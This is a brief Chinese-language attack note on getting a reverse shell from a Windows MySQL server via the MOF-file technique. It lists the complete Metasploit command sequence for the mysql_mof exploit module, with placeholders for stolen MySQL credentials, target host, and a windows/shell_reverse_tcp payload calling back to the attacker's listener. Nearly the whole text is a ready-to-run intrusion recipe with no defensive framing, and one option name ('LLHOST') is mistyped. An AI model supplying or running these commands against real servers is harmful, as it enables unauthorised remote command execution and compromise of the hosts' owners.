mysql反弹shell
mysql反弹shell
metasploit已经有针对该方式的利用代码,原理还是一样生成mof文件,只是metasploit中可以使用到反弹技术,就不用额外添加用户,前提是对方服务器允许访问公网
use exploit/windows/mysql/mysql_mof
set PASSWORD xxx //设置登录mysql的密码
set USERNAME xxx //设置登录mysql的用户
set RHOST xxx //设置要登录的ip地址
set RPORT xxxx //设置mysql的端口号
set payload windows/shell_reverse_tcp //所使用的反弹模块
set LLHOST xxx //反弹到的ip地址
set LPORT xxx //反弹到的端口
show options //设置完成后,使用该命令可查看设置参数情况
exploit //执行